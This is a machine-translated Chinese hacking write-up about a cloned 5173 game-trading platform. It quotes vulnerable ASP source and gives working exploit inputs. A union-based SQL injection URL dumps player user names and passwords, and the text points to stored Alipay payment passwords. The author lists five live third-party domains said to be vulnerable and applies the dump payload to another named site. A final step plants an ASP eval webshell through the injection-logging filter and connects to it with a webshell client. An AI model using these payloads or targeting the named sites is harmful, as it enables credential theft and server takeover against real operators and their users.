Imitation 5173 Game trading Platform System SQL injection (can be directly de-pants) +getshell

Recently did not log on the game a few years ago to see, found someone shouting high-priced, this is a liar, such a liar still want to deceive me? I came to see this tease is how to deceive, the results found that this person gave a said is 5173 platform trading site, called me directly to fill in the information and then filled out then he will go to buy, and then carefully looked at the platform, get the source code after looking at ~ hehe, the loophole is still a lot of ~ Imitation 5173 online games trading Platform game trading platform there is an injection and Getshell vulnerability, you can directly drag off the player data ~
Black clouds on the clouds do not accept, so it's OK to send a zone for everyone to play. In fact, this system is still a lot of loopholes, I hate the liar, we can make a few cheat platform on a few go to it ~ Most of the cases are some cheats built to fish.



A:sql Injection One:
Vulnerability file:/help.asp

<!--#include file="conn.asp"-->
<!--#include file="inc/config.asp"-->

    <%
  if trim(request("id")) <> "" then
  set rs=conn.execute("select * from help where id ="&trim(request("id"))&" order by paixu asc")
  if not rs.eof then
  title=rs("help_title")
  content=rs("help_content")
  end if
  else
  set rs=conn.execute("select top 1 * from help order by paixu asc")
    if not rs.eof then
  title=rs("help_title")
  content=rs("help_content")
  end if
  end if%>

Here the ID parameter filter is not strict with SQL injection, but the conn.asp contains:
<!--#include file="sqlin.asp"-->Know this anti-injection file is very garbage, only do get and post anti-injection, can be directly converted to Cookie injection bypass



I'm not going to go into this one, look at the next injection point that supports union query.


B:sql Injection Two
Vulnerability file:/card_server.asp

<%
function Opendb (sdbname)
{
/*
*---------------opendb (sdbname)-----------------
* OPENDB (Sdbname)
* Function: Open database Sdbname, return conn object.
* Parameters: Sdbname, String, database name.
* Example: var conn = opendb ("Database.mdb");
*---------------opendb (sdbname)-----------------
*/
/*var connstr = "Driver={sql server};server=.; Uid=sa;pwd=7881541;database=wangyou "; * *
var connstr = "Provider=Microsoft.Jet.OLEDB.4.0; Data source= "+server.mappath (sdbname);
var conn = Server.CreateObject ("ADODB. Connection ");
Conn. Open (CONNSTR);
Return conn;
}
var oconn = opendb ("hsgamedb/#HSgame201008041121. asp");
var sel = Request ("sel");
var classid = Request ("ClassID")
var fieldname = Request ("fieldname")
var arrresult = new Array ();
var sql = "Select" +fieldname+ "from Game_class where parentid= '" +sel+ "' and classid=" +CLASSID;
var sql = "Select * from Card_class where parentid=" +sel+ "";
Response.Write ("Alert (" +sql+ ")")
var rs0 = Server.CreateObject ("ADODB. Recordset ");
Rs0. Open (sql,oconn,1,1);
while (!rs0. EOF)
{
Traverse all the appropriate data into the Arrresult array.
Arrresult[arrresult.length] = Rs0 (0). Value+ "|" +rs0 (1). Value;
Rs0. MoveNext ();
}
Escape solved the XMLHTTP. The problem of Chinese processing.
The array group is composed of strings. concatenated by the "," string.
Response.Write (Escape (Arrresult.join (",")));
%>

There is no direct inclusion of the database connection file, directly created the connection object, resulting in this injection is unable to be sqlin.asp defense, note that the request's SEL parameter is not filtered directly into the query resulting in SQL injection. Simply construct the injection point:


http://127.0.0.1/card_server.asp?sel=1‘

Microsoft JET Database Engine 错误 ‘80040e14‘
字符串的语法错误 在查询表达式 ‘parentid=1‘‘ 中。
/card_server.asp，行 28






Support Joint query, can take off Ganme_user player data, as if Sqlmap no game_user dictionary it? There is also a field "Alipay_pwd" is the user's payment password ~


http://127.0.0.1/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user




Because of the general type of 5 cases, then I will come five ~


http://hhgg88.com/card_server.asp?sel=1
http://www.loft98.com.cn/card_server.asp?sel=1
http://mosouu.com/card_server.asp?sel=1
http://gaoyi.cc/card_server.asp?sel=1
http://www.631hk.com/card_server.asp?sel=1


I'm going to take a pair of pants to show you:

http://www.tylsf.com.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user




C:getshell:
Vulnerability file:/sqlin.asp


<%
'--------Database Connection Section--------------
' Dim dbkillsql,killsqlconn,connkillsql
Dbkillsql= "Sql_whelpu.asp"
' On Error Resume Next
Set killsqlconn = Server.CreateObject ("ADODB. Connection ")
Connkillsql= "Provider=Microsoft.Jet.OLEDB.4.0;Data source=" & Server.MapPath (Dbkillsql)
Killsqlconn.open Connkillsql
If ERR Then
Err. Clear
Set Killsqlconn = Nothing
Response.Write "Database connection error, please check the connection string. "
Response.End
End If


'--------define some------------------
' Dim Fy_post,fy_get,fy_in,fy_inf,fy_xh,fy_db,fy_dbstr,kill_ip,writesql
' Customize the string to be filtered, separated by ' | '
fy_in = "' |;| and|exec|insert|select|delete|update|count|*|%| Chr|mid|master|truncate|char|declare "
Kill_ip=true
Writesql=true
‘----------------------------------


Fy_inf = Split (fy_in, "|")
'--------Post section------------------
If request.form<> "" Then
For each fy_post in Request.Form
For fy_xh=0 to Ubound (Fy_inf)
If Instr (LCase (Request.Form (Fy_post)), Fy_inf (FY_XH)) <>0 Then
If Writesql=true Then
Killsqlconn.execute ("INSERT into Sqlin (SQLIN_IP,SQLIN_WEB,SQLIN_FS,SQLIN_CS,SQLIN_SJ) VALUES ('" & Request.ServerVariables ("REMOTE_ADDR") & "', '" &request.servervariables ("URL") & "', ' POST ', '" &fy_ post& "', '" &replace (Request.Form (fy_post), "'", "" ") &" ') "
Killsqlconn.close
Set Killsqlconn = Nothing
End If
Response.Write "<script language=javascript>alert (' System tip: 108 Illegal operation! ');</script> "
Response.Write "Illegal Operation! The system makes the following records ↓<br> "
Response.Write "Operation IP:" &request.servervariables ("REMOTE_ADDR") & "<br>"
Response.Write "Operating time:" &Now& "<br>"
Response.Write "Action page:" &request.servervariables ("URL") & "<br>"
Response.Write "Submission Method:post<br>"
Response.Write "Submit Parameters:" &Fy_Post& "<br>"
Response.Write "Submit data:" &request.form (Fy_post)
Response.Redirect ("Default.asp")
Response.End
End If
Next
Next
End If
‘----------------------------------

'--------Get partial-------------------
If request.querystring<> "" Then
For each fy_get in Request.QueryString
For fy_xh=0 to Ubound (Fy_inf)
If Instr (LCase (Request.QueryString (Fy_get)), Fy_inf (FY_XH)) <>0 Then
If Writesql=true Then
Killsqlconn.execute ("INSERT into Sqlin (SQLIN_IP,SQLIN_WEB,SQLIN_FS,SQLIN_CS,SQLIN_SJ) VALUES ('" & Request.ServerVariables ("REMOTE_ADDR") & "', '" &request.servervariables ("URL") & "', ' GET ', '" &fy_get & "', '" &replace (Request.QueryString (fy_get), "'", "" ") &" ') "
Killsqlconn.close
Set Killsqlconn = Nothing
End If
Response.Write "<script language=javascript>alert (' System tip: 108 Illegal operation! ');</script> "
Response.Write "Illegal Operation! The system makes the following records ↓<br> "
Response.Write "Operation IP:" &request.servervariables ("REMOTE_ADDR") & "<br>"
Response.Write "Operating time:" &Now& "<br>"
Response.Write "Action page:" &request.servervariables ("URL") & "<br>"
Response.Write "Submission Method:get<br>"
Response.Write "Submit Parameters:" &Fy_Get& "<br>"
Response.Write "Submit data:" &request.querystring (Fy_get)
Response.Redirect ("Default.asp")
Response.End
End If
Next
Next
End If


%>


Here directly the user illegally committed the string written to the sql_whelpu.asp database inside, imagine, if deliberately add a sentence can Getshell it? The <%%> symbol without being inserted into the ASP can be accessed directly:

http://127.0.0.1/list_buy.asp?class_1=35536%20%3C%eval%20request(1)%%3E

Of course, if you have been submitted by the need to pay attention to the closure of the Webshell can be obtained ~ here to successfully write a sentence to the database: sql_whelpu.asp, we open to see it?



Chopper Connection:
http://127.0.0.1/sql_whelpu.asp

Imitation 5173 Game trading Platform System SQL injection (can be directly de-pants) +getshell